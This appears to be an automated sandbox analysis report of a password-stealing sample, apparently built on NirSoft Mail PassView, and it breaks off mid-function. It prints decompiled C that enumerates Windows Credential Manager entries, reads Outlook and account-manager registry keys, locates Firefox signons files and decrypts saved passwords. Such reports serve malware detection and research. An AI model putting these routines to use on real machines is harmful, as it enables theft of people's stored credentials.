                                                  • API ID: AddressProc$Library$FreeLoad
                                                  • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                  • API String ID: 2449869053-4258758744
                                                  • Opcode ID: 1dbd091348eef99b9c60bfcaa5dda145de35d3414d0ae1ecd7a3a02af1b4a616
                                                  • Instruction ID: 1c6fa8d05b29e269fad2443f962c2e8eb3052cc88d23d174a3c6f0c0958544ff
                                                  • Opcode Fuzzy Hash: 1dbd091348eef99b9c60bfcaa5dda145de35d3414d0ae1ecd7a3a02af1b4a616
                                                  • Instruction Fuzzy Hash: 380121705447009AC730AF75CD08B46BAF4EF85704F218D2EE281A3690E7BE9491DF88
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 76%
                                                  			E00411015(void* __ecx, signed int __edx, void* __eflags, signed int _a4, intOrPtr _a8, char* _a12, signed int* _a16) {
                                                  				void _v8;
                                                  				void _v12;
                                                  				void _v24;
                                                  				char _v39;
                                                  				void _v40;
                                                  				char _v132;
                                                  				void _v1156;
                                                  				void _v1172;
                                                  				char _v1180;
                                                  				void _v1187;
                                                  				char _v1188;
                                                  				void _v2228;
                                                  				void _v2243;
                                                  				void _v2244;
                                                  				void _v3267;
                                                  				char _v3268;
                                                  				void _v4291;
                                                  				char _v4292;
                                                  				char _v5340;
                                                  				void _v5347;
                                                  				char _v5348;
                                                  				char _v6116;
                                                  				char _v7136;
                                                  				void _v7140;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				int _t86;
                                                  				void* _t109;
                                                  				void* _t122;
                                                  				void* _t135;
                                                  				char _t156;
                                                  				signed char _t168;
                                                  				signed int _t171;
                                                  				intOrPtr _t177;
                                                  				signed int _t183;
                                                  				void* _t185;
                                                  
                                                  				_t171 = __edx;
                                                  				E004118A0(0x1be4, __ecx);
                                                  				_t156 = 0;
                                                  				_v3268 = 0;
                                                  				memset( &_v3267, 0, 0x3ff);
                                                  				_a8 = E00410E8A(_a8,  &_v3268);
                                                  				_t86 = strlen(_a4);
                                                  				_v8 = _t86;
                                                  				if(_a8 > 4) {
                                                  					_t193 = _t86;
                                                  					if(_t86 > 0) {
                                                  						asm("movsd");
                                                  						asm("movsd");
                                                  						asm("movsb");
                                                  						_v2244 = 0;
                                                  						memset( &_v2243, 0, 0x41e);
                                                  						_v1188 = 0;
                                                  						memset( &_v1187, 0, 0x41e);
                                                  						_v5348 = 0;
                                                  						memset( &_v5347, 0, 0x41e);
                                                  						_v40 = 0;
                                                  						asm("stosd");
                                                  						asm("stosd");
                                                  						asm("stosd");
                                                  						asm("stosw");
                                                  						asm("stosb");
                                                  						_v4292 = 0;
                                                  						memset( &_v4291, 0, 0x3ff);
                                                  						E0040BC49( &_v132);
                                                  						E0040BC6D(_v8,  &_v132, _a4);
                                                  						_t181 =  &_v132;
                                                  						E0040BD0B( &_v39,  &_v132,  &_v2244);
                                                  						memcpy( &_v2228,  &_v24, 8);
                                                  						E0040BC49( &_v132);
                                                  						_push( &_v2244);
                                                  						_t109 = 0x18;
                                                  						E0040BC6D(_t109,  &_v132);
                                                  						E0040BD0B( &_v39, _t181,  &_v1188);
                                                  						memcpy( &_v1172,  &_v2244, 0x10);
                                                  						memcpy( &_v1156,  &_v24, 8);
                                                  						E0040BC49(_t181);
                                                  						_push( &_v1188);
                                                  						_t122 = 0x28;
                                                  						E0040BC6D(_t122, _t181);
                                                  						E0040BD0B( &_v39, _t181,  &_v5348);
                                                  						E0040535A( &_v6116, _t193,  &_v1180,  &_v5348);
                                                  						E004053D6( &_v5340,  &_v1188,  &_v4292,  &_v6116);
                                                  						_t177 = _a8;
                                                  						asm("cdq");
                                                  						_t183 = _t177 + (_t171 & 0x00000007) >> 3;
                                                  						_a4 = 0;
                                                  						if(_t183 > 0) {
                                                  							do {
                                                  								E004053D6(_t185 + (_a4 << 3) - 0xcc0,  &_v6116, _t185 + (_a4 << 3) - 0x10b8,  &_v6116);
                                                  								_a4 =  &(_a4[1]);
                                                  							} while (_a4 < _t183);
                                                  							_t177 = _a8;
                                                  						}
                                                  						_t135 = 0;
                                                  						if(_t177 > _t156) {
                                                  							do {
                                                  								_t168 =  *(_t185 + _t135 - 0x10c0) ^  *(_t185 + _t135 - 0xcc0);
                                                  								_t135 = _t135 + 1;
                                                  								 *(_t185 + _t135 - 0x1be1) = _t168;
                                                  							} while (_t135 < _t177);
                                                  						}
                                                  						 *((char*)(_t185 + _t177 - 0x1be0)) = _t156;
                                                  						strcpy(_a12,  &_v7136);
                                                  						E0040BC49( &_v132);
                                                  						_t67 = _t177 - 4; // 0x0
                                                  						E0040BC6D(_t67,  &_v132, _a12);
                                                  						E0040BD0B(_t177,  &_v132,  &_v40);
                                                  						memcpy( &_v8,  &_v40, 4);
                                                  						memcpy( &_v12,  &_v7140, 4);
                                                  						_t156 = 1;
                                                  						 *_a16 = 0 | _v8 == _v12;
                                                  					}
                                                  				}
                                                  				return _t156;
                                                  			}


                                                  APIs
                                                  • memset.MSVCRT ref: 0041103A
                                                    • Part of subcall function 00410E8A: strlen.MSVCRT ref: 00410E97
                                                  • strlen.MSVCRT ref: 00411056
                                                  • memset.MSVCRT ref: 00411090
                                                  • memset.MSVCRT ref: 004110A4
                                                  • memset.MSVCRT ref: 004110B8
                                                  • memset.MSVCRT ref: 004110DE
                                                    • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCFE
                                                    • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD2A
                                                    • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD40
                                                    • Part of subcall function 0040BD0B: memcpy.MSVCRT ref: 0040BD77
                                                    • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD81
                                                  • memcpy.MSVCRT ref: 00411115
                                                    • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCB0
                                                    • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCDA
                                                    • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD52
                                                  • memcpy.MSVCRT ref: 00411151
                                                  • memcpy.MSVCRT ref: 00411163
                                                  • strcpy.MSVCRT(?,?), ref: 0041123A
                                                  • memcpy.MSVCRT ref: 0041126B
                                                  • memcpy.MSVCRT ref: 0041127D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpymemset$strlen$strcpy
                                                  • String ID: salu
                                                  • API String ID: 2660478486-4177317985
                                                  • Opcode ID: ae1d07347fa3aa89f5fcc6141a6fc90f028ff7b9ab687112944546eff88cf5b8
                                                  • Instruction ID: 480a48fc981763c339c301d1addb7ab339a070bf665ce532ed27993edd9122c1
                                                  • Opcode Fuzzy Hash: ae1d07347fa3aa89f5fcc6141a6fc90f028ff7b9ab687112944546eff88cf5b8
                                                  • Instruction Fuzzy Hash: A4717F7190011DAADB10EBA9CC819DEB7BDFF08348F1445BAF609E7151DB749B888F94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 81%
                                                  			E00403E87(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                  				intOrPtr* _v8;
                                                  				char _v76;
                                                  				void _v1099;
                                                  				char _v1100;
                                                  				void _v2123;
                                                  				char _v2124;
                                                  				void _v3147;
                                                  				char _v3148;
                                                  				char _v4172;
                                                  				void* __ebx;
                                                  				void* __esi;
                                                  				void* _t36;
                                                  				void* _t37;
                                                  				void* _t48;
                                                  				void* _t55;
                                                  				intOrPtr* _t56;
                                                  				signed int _t58;
                                                  				intOrPtr* _t63;
                                                  				void* _t70;
                                                  				void* _t71;
                                                  
                                                  				_t56 = __ecx;
                                                  				E004118A0(0x1048, __ecx);
                                                  				_t63 = _t56;
                                                  				_v8 = _t63;
                                                  				E00405EFD(_a4, "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
                                                  				_v1100 = 0;
                                                  				memset( &_v1099, 0, 0x3ff);
                                                  				_v3148 = 0;
                                                  				memset( &_v3147, 0, 0x3ff);
                                                  				_v2124 = 0;
                                                  				memset( &_v2123, 0, 0x3ff);
                                                  				_t71 = _t70 + 0x2c;
                                                  				if( *0x417308 != 0) {
                                                  					sprintf( &_v3148, "<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>", 0x417308);
                                                  					_t71 = _t71 + 0xc;
                                                  				}
                                                  				if( *0x417304 != 0) {
                                                  					strcpy( &_v1100, "<table dir=\"rtl\"><tr><td>\r\n");
                                                  				}
                                                  				_t36 =  *((intOrPtr*)( *_t63 + 0x1c))();
                                                  				_t58 = 0x10;
                                                  				_push(_t36);
                                                  				_t37 = memcpy( &_v76, "<html><head>%s<title>%s</title></head>\r\n<body>\r\n%s <h3>%s</h3>\r\n", _t58 << 2);
                                                  				asm("movsb");
                                                  				sprintf( &_v4172,  &_v76,  &_v3148, _t37,  &_v1100);
                                                  				E00405EFD(_a4,  &_v4172);
                                                  				_push("Mail PassView");
                                                  				_t55 = 6;
                                                  				_push(E004078FF(_t55));
                                                  				sprintf( &_v2124, "<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
                                                  				_t48 = E00405EFD(_a4,  &_v2124);
                                                  				_t78 = _a8 - 4;
                                                  				if(_a8 == 4) {
                                                  					return E004097E6(_v8, _t78, _a4);
                                                  				}
                                                  				return _t48;
                                                  			}


                                                  APIs
                                                    • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                    • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,74B04DE0,00000000,?,?,004092ED,00000001,00412B1C,74B04DE0), ref: 00405F17
                                                  • memset.MSVCRT ref: 00403EBF
                                                  • memset.MSVCRT ref: 00403ED3
                                                  • memset.MSVCRT ref: 00403EE7
                                                  • sprintf.MSVCRT ref: 00403F08
                                                  • strcpy.MSVCRT(?,<table dir="rtl"><tr><td>), ref: 00403F24
                                                  • sprintf.MSVCRT ref: 00403F5B
                                                  • sprintf.MSVCRT ref: 00403F8C
                                                  Strings
                                                  • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F36
                                                  • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F86
                                                  • Mail PassView, xrefs: 00403F72
                                                  • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403E97
                                                  • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F02
                                                  • <table dir="rtl"><tr><td>, xrefs: 00403F1E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memsetsprintf$FileWritestrcpystrlen
                                                  • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>$Mail PassView
                                                  • API String ID: 1043021993-495024357
                                                  • Opcode ID: 9ab723875cfdb90570c6b26727e8dc31f2cea9ea6bbea43a89162690f7ebea04
                                                  • Instruction ID: b86957a5e19b08f75c710fe46d40d6f019605627493d012667a382a844d4f915
                                                  • Opcode Fuzzy Hash: 9ab723875cfdb90570c6b26727e8dc31f2cea9ea6bbea43a89162690f7ebea04
                                                  • Instruction Fuzzy Hash: A93196B2C40118BADB11EB55DC82EDE7BACEF44304F0045A7B60DA3151DE786FC88BA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00404288(intOrPtr __ecx, void* __esi, void* __fp0, wchar_t** _a4) {
                                                  				intOrPtr _v8;
                                                  				char _v280;
                                                  				char _v408;
                                                  				intOrPtr _v412;
                                                  				char _v796;
                                                  				intOrPtr _v800;
                                                  				char _v928;
                                                  				char _v940;
                                                  				wchar_t* _t23;
                                                  				char* _t41;
                                                  				wchar_t** _t59;
                                                  				void* _t76;
                                                  
                                                  				_t76 = __fp0;
                                                  				_t59 = _a4;
                                                  				_t23 =  *_t59;
                                                  				_v8 = __ecx;
                                                  				if(_t23 != 0 && _t59[1] != 0 && _t59[2] != 0 && wcsstr(_t23, L"www.google.com") != 0) {
                                                  					E004021D8( &_v940);
                                                  					_v800 = 7;
                                                  					_v412 = 3;
                                                  					WideCharToMultiByte(0, 0, _t59[1], 0xffffffff,  &_v408, 0x7f, 0, 0);
                                                  					WideCharToMultiByte(0, 0, _t59[2], 0xffffffff,  &_v280, 0x7f, 0, 0);
                                                  					strcpy( &_v928,  &_v408);
                                                  					strcpy( &_v796,  &_v408);
                                                  					if(strchr( &_v796, 0x40) == 0 && strlen( &_v408) + 0xa < 0x7f) {
                                                  						sprintf( &_v796, "%s@gmail.com",  &_v408);
                                                  					}
                                                  					_t41 = strchr( &_v928, 0x40);
                                                  					if(_t41 != 0) {
                                                  						 *_t41 = 0;
                                                  					}
                                                  					E00402407( &_v940, _t76, _v8 + 0xfffff788);
                                                  				}
                                                  				return 1;
                                                  			}


                                                  APIs
                                                  • wcsstr.MSVCRT ref: 004042BD
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404304
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404318
                                                  • strcpy.MSVCRT(?,?), ref: 00404328
                                                  • strcpy.MSVCRT(?,?,?,?), ref: 0040433B
                                                  • strchr.MSVCRT ref: 00404349
                                                  • strlen.MSVCRT ref: 0040435D
                                                  • sprintf.MSVCRT ref: 0040437E
                                                  • strchr.MSVCRT ref: 0040438F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWidestrchrstrcpy$sprintfstrlenwcsstr
                                                  • String ID: %s@gmail.com$www.google.com
                                                  • API String ID: 1359934567-4070641962
                                                  • Opcode ID: 8108c03dee5360a7f6a3e2f925f6b83e3505abd913d650f45db378c2ca998167
                                                  • Instruction ID: 90bd0330eeb49ee3a27dc93359d6b9986b282e86ae315167fefd13048bcd18fc
                                                  • Opcode Fuzzy Hash: 8108c03dee5360a7f6a3e2f925f6b83e3505abd913d650f45db378c2ca998167
                                                  • Instruction Fuzzy Hash: 793188B290021D7FDB21D791DD81FDAB3ACDB44354F1005A7F709E2181D678AF858A58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 96%
                                                  			E0040827A(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, char* _a8) {
                                                  				void _v4103;
                                                  				char _v4104;
                                                  				int _t21;
                                                  				int _t28;
                                                  				void* _t35;
                                                  
                                                  				_t35 = __eflags;
                                                  				E004118A0(0x1004, __ecx);
                                                  				strcpy(0x4171b8, _a8);
                                                  				strcpy(0x4172c0, "general");
                                                  				E00407E55(_t35, "TranslatorName", 0x412466);
                                                  				E00407E55(_t35, "TranslatorURL", 0x412466);
                                                  				EnumResourceNamesA(_a4, 4, E004080A3, 0);
                                                  				EnumResourceNamesA(_a4, 5, E004080A3, 0);
                                                  				strcpy(0x4172c0, "strings");
                                                  				_t28 = 0;
                                                  				_v4104 = 0;
                                                  				memset( &_v4103, 0, 0x1000);
                                                  				do {
                                                  					_t21 = LoadStringA(_a4, _t28,  &_v4104, 0x1000);
                                                  					if(_t21 > 0) {
                                                  						_t21 = E00407EC3(_t28,  &_v4104);
                                                  					}
                                                  					_t28 = _t28 + 1;
                                                  				} while (_t28 <= 0xffff);
                                                  				 *0x4171b8 = 0;
                                                  				return _t21;
                                                  			}

                                                  APIs
                                                  • strcpy.MSVCRT(004171B8,00000000,00000000,00000000,?,?,004083AB,00000000,?,00000000,00000104,?), ref: 00408292
                                                  • strcpy.MSVCRT(004172C0,general,004171B8,00000000,00000000,00000000,?,?,004083AB,00000000,?,00000000,00000104,?), ref: 004082A2
                                                    • Part of subcall function 00407E55: memset.MSVCRT ref: 00407E7A
                                                    • Part of subcall function 00407E55: GetPrivateProfileStringA.KERNEL32(004172C0,00000104,00412466,?,00001000,004171B8), ref: 00407E9E
                                                    • Part of subcall function 00407E55: WritePrivateProfileStringA.KERNEL32(004172C0,?,?,004171B8), ref: 00407EB5
                                                  • EnumResourceNamesA.KERNEL32 ref: 004082D8
                                                  • EnumResourceNamesA.KERNEL32 ref: 004082E2
                                                  • strcpy.MSVCRT(004172C0,strings,?,004083AB,00000000,?,00000000,00000104,?), ref: 004082EA
                                                  • memset.MSVCRT ref: 00408306
                                                  • LoadStringA.USER32 ref: 0040831A
                                                    • Part of subcall function 00407EC3: _itoa.MSVCRT ref: 00407EE4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Stringstrcpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                  • String ID: TranslatorName$TranslatorURL$general$strings
                                                  • API String ID: 1060401815-3647959541
                                                  • Opcode ID: acaf4a6ca7367b184f6fdf17ade1074e09c73fb74d797c334c49b365d943b025
                                                  • Instruction ID: d5eae57ffc3fdd8f11c9b4c351fac369e1a37aafa95eb04bb89d09d1e585c4c7
                                                  • Opcode Fuzzy Hash: acaf4a6ca7367b184f6fdf17ade1074e09c73fb74d797c334c49b365d943b025
                                                  • Instruction Fuzzy Hash: 6E1104319802543AD7212B56DC06FCB3E6DCF85B59F1040BBB708B6191C9BC9EC087AD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 83%
                                                  			E0040D1EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
                                                  				void _v267;
                                                  				char _v268;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* _t31;
                                                  				int _t40;
                                                  				void* _t44;
                                                  				void* _t49;
                                                  				char* _t50;
                                                  				void* _t57;
                                                  				int _t62;
                                                  				char* _t68;
                                                  				void* _t70;
                                                  				void* _t73;
                                                  				void* _t74;
                                                  				intOrPtr* _t86;
                                                  				char* _t89;
                                                  				void* _t90;
                                                  				char** _t91;
                                                  
                                                  				_t86 = __eax;
                                                  				_t31 = E00406C2F(__eax + 0x1c, __eax, __eflags, _a4);
                                                  				_t94 = _t31;
                                                  				if(_t31 == 0) {
                                                  					__eflags = 0;
                                                  					return 0;
                                                  				}
                                                  				E0040462E(_t86 + 0x468);
                                                  				_t68 = _t86 + 0x158;
                                                  				E004061FF(_t68, _a4);
                                                  				_t89 = _t86 + 0x25d;
                                                  				 *_t89 = 0;
                                                  				E0040C530(_t94, _t86 + 0x18);
                                                  				if( *_t89 == 0) {
                                                  					_t62 = strlen(_t68);
                                                  					 *_t91 = "signons.txt";
                                                  					_t9 = strlen(??) + 1; // 0x1
                                                  					if(_t62 + _t9 >= 0x104) {
                                                  						 *_t89 = 0;
                                                  					} else {
                                                  						E004062AD(_t89, _t86 + 0x158, "signons.txt");
                                                  					}
                                                  				}
                                                  				_v268 = 0;
                                                  				memset( &_v267, 0, 0x104);
                                                  				_t40 = strlen(_t86 + 0x158);
                                                  				_t91[3] = "signons.sqlite";
                                                  				_t15 = strlen(??) + 1; // 0x1
                                                  				_pop(_t73);
                                                  				if(_t40 + _t15 >= 0x104) {
                                                  					_v268 = 0;
                                                  				} else {
                                                  					E004062AD( &_v268, _t86 + 0x158, "signons.sqlite");
                                                  					_pop(_t73);
                                                  				}
                                                  				_t98 =  *_t89;
                                                  				if( *_t89 != 0) {
                                                  					_t57 = E00406C2F(_t86 + 4, _t86, _t98, _t89);
                                                  					_t99 = _t57;
                                                  					if(_t57 != 0) {
                                                  						E0040C475(_t73, _t86, _t99);
                                                  					}
                                                  				}
                                                  				_t44 = E0040614B( &_v268);
                                                  				_t100 = _t44;
                                                  				_pop(_t74);
                                                  				if(_t44 != 0) {
                                                  					E0040CE28(_t74, _t100, _t86,  &_v268);
                                                  				}
                                                  				_t70 = 0;
                                                  				if( *((intOrPtr*)(_t86 + 0x474)) <= 0) {
                                                  					L19:
                                                  					return 1;
                                                  				} else {
                                                  					do {
                                                  						_t90 = E0040D438(_t70, _t86 + 0x468);
                                                  						_t24 = _t90 + 0x504; // 0x504
                                                  						_t49 = _t24;
                                                  						_push("none");
                                                  						_push(_t49);
                                                  						L004115B2();
                                                  						if(_t49 != 0) {
                                                  							_t25 = _t90 + 4; // 0x4
                                                  							_t50 = _t25;
                                                  							if( *_t50 == 0) {
                                                  								_t26 = _t90 + 0x204; // 0x204
                                                  								strcpy(_t50, _t26);
                                                  							}
                                                  							 *((intOrPtr*)( *_t86 + 4))(_t90);
                                                  						}
                                                  						_t70 = _t70 + 1;
                                                  					} while (_t70 <  *((intOrPtr*)(_t86 + 0x474)));
                                                  					goto L19;
                                                  				}
                                                  			}

                                                  APIs
                                                    • Part of subcall function 00406C2F: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040D205,?,?,?,?), ref: 00406C48
                                                    • Part of subcall function 00406C2F: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00406C74
                                                    • Part of subcall function 0040462E: free.MSVCRT(00000000,0040BC35), ref: 00404635
                                                    • Part of subcall function 004061FF: strcpy.MSVCRT(?,?,0040D228,?,?,?,?,?), ref: 00406204
                                                    • Part of subcall function 004061FF: strrchr.MSVCRT ref: 0040620C
                                                    • Part of subcall function 0040C530: memset.MSVCRT ref: 0040C551
                                                    • Part of subcall function 0040C530: memset.MSVCRT ref: 0040C565
                                                    • Part of subcall function 0040C530: memset.MSVCRT ref: 0040C579
                                                    • Part of subcall function 0040C530: memcpy.MSVCRT ref: 0040C646
                                                    • Part of subcall function 0040C530: memcpy.MSVCRT ref: 0040C6A6
                                                  • strlen.MSVCRT ref: 0040D241
                                                  • strlen.MSVCRT ref: 0040D24F
                                                    • Part of subcall function 004062AD: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062B5
                                                    • Part of subcall function 004062AD: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062C4
                                                  • memset.MSVCRT ref: 0040D28F
                                                  • strlen.MSVCRT ref: 0040D29E
                                                  • strlen.MSVCRT ref: 0040D2AC
                                                  • _stricmp.MSVCRT(00000504,none,?,?,?), ref: 0040D339
                                                  • strcpy.MSVCRT(00000004,00000204,?,?,?), ref: 0040D354
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memsetstrlen$strcpy$memcpy$CloseFileHandleSize_stricmpfreestrcatstrrchr
                                                  • String ID: none$signons.sqlite$signons.txt
                                                  • API String ID: 2681923396-1088577317
                                                  • Opcode ID: 320e3f5b2275387b9dd69f73878994cc1174bc0b0e146de94454896ca0fe85a1
                                                  • Instruction ID: 747294efef189d2a86bae337d02489a359e47e35f4212505bb9232dde5c11721
                                                  • Opcode Fuzzy Hash: 320e3f5b2275387b9dd69f73878994cc1174bc0b0e146de94454896ca0fe85a1
                                                  • Instruction Fuzzy Hash: 3041E3B1508246AAD710EBB1CC81BDAB798AF40305F10057FE596E21C2EB7CE9C9876D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00402C44(void* __ecx, void* __fp0, intOrPtr _a4) {
                                                  				void* _v8;
                                                  				int _v12;
                                                  				char _v16;
                                                  				char _v20;
                                                  				void _v275;
                                                  				char _v276;
                                                  				void _v1299;
                                                  				char _v1300;
                                                  				void* __esi;
                                                  				void* _t35;
                                                  				intOrPtr _t36;
                                                  				void* _t40;
                                                  				void* _t52;
                                                  				void* _t58;
                                                  				void* _t60;
                                                  				void* _t64;
                                                  				char* _t66;
                                                  				void* _t73;
                                                  				void* _t74;
                                                  				void* _t75;
                                                  				void* _t76;
                                                  				void* _t77;
                                                  				void* _t83;
                                                  
                                                  				_t83 = __fp0;
                                                  				_t64 = __ecx;
                                                  				_t35 = E0040EB3F(0x80000001, "Identities",  &_v8);
                                                  				_t74 = _t73 + 0xc;
                                                  				if(_t35 == 0) {
                                                  					_v12 = 0;
                                                  					_v276 = 0;
                                                  					memset( &_v275, 0, 0xff);
                                                  					_t40 = E0040EC05(_v8, 0,  &_v276);
                                                  					_t75 = _t74 + 0x18;
                                                  					if(_t40 == 0) {
                                                  						_t66 = "%s\\%s";
                                                  						do {
                                                  							_t69 = _a4;
                                                  							E0040EBC1(_t64, _v8,  &_v276, "Username", _a4 + 0xa9c, 0x7f);
                                                  							_v1300 = 0;
                                                  							memset( &_v1299, 0, 0x3ff);
                                                  							sprintf( &_v1300, _t66,  &_v276, "Software\\Microsoft\\Internet Account Manager\\Accounts");
                                                  							_t52 = E0040EB3F(_v8,  &_v1300,  &_v16);
                                                  							_t76 = _t75 + 0x3c;
                                                  							_t80 = _t52;
                                                  							if(_t52 == 0) {
                                                  								E00402BB8(_t64,  &_v16, _t80, _t83, _t69, 1);
                                                  							}
                                                  							sprintf( &_v1300, _t66,  &_v276, "Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts");
                                                  							_t58 = E0040EB3F(_v8,  &_v1300,  &_v20);
                                                  							_t77 = _t76 + 0x1c;
                                                  							_t81 = _t58;
                                                  							if(_t58 == 0) {
                                                  								E00402BB8(_t64,  &_v20, _t81, _t83, _a4, 5);
                                                  							}
                                                  							_v12 = _v12 + 1;
                                                  							_t60 = E0040EC05(_v8, _v12,  &_v276);
                                                  							_t75 = _t77 + 0xc;
                                                  						} while (_t60 == 0);
                                                  					}
                                                  					RegCloseKey(_v8);
                                                  				}
                                                  				_t36 = _a4;
                                                  				 *((char*)(_t36 + 0xa9c)) = 0;
                                                  				return _t36;
                                                  			}

                                                  APIs
                                                    • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                  • memset.MSVCRT ref: 00402C84
                                                    • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402D86
                                                    • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                  • memset.MSVCRT ref: 00402CDE
                                                  • sprintf.MSVCRT ref: 00402CF7
                                                  • sprintf.MSVCRT ref: 00402D35
                                                    • Part of subcall function 00402BB8: memset.MSVCRT ref: 00402BD8
                                                    • Part of subcall function 00402BB8: RegCloseKey.ADVAPI32 ref: 00402C3C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Closememset$sprintf$EnumOpen
                                                  • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                  • API String ID: 1831126014-3814494228
                                                  • Opcode ID: e558669e5098f51d47a130cd26e8095db06e1949dd15f7d6cacb61a667ea587b
                                                  • Instruction ID: 6c0256c292ffb55b53f7a2730c4bcad7d13cefd93b753116a94389aae211c0df
                                                  • Opcode Fuzzy Hash: e558669e5098f51d47a130cd26e8095db06e1949dd15f7d6cacb61a667ea587b
                                                  • Instruction Fuzzy Hash: 25315C72D0011DBADB11EA96CD46EEFB77CAF04344F0405BABA19F2091E6B49F988F54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 93%
                                                  			E0040B53C(void* __ecx, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
                                                  				void* _v8;
                                                  				intOrPtr _v20;
                                                  				void* _v24;
                                                  				void* _v28;
                                                  				void* __ebx;
                                                  				void* __esi;
                                                  				signed int _t45;
                                                  				intOrPtr _t50;
                                                  				signed int _t53;
                                                  				intOrPtr _t82;
                                                  				signed char _t86;
                                                  				intOrPtr _t88;
                                                  				intOrPtr _t90;
                                                  				void* _t91;
                                                  				void* _t92;
                                                  
                                                  				_t84 = __ecx;
                                                  				_t88 = _a4;
                                                  				_t92 = _t88 - 0x402;
                                                  				_t91 = __ecx;
                                                  				if(_t92 > 0) {
                                                  					_t45 = _t88 - 0x415;
                                                  					__eflags = _t45;
                                                  					if(_t45 == 0) {
                                                  						E0040A4C8(__ecx);
                                                  						L22:
                                                  						__eflags = 0;
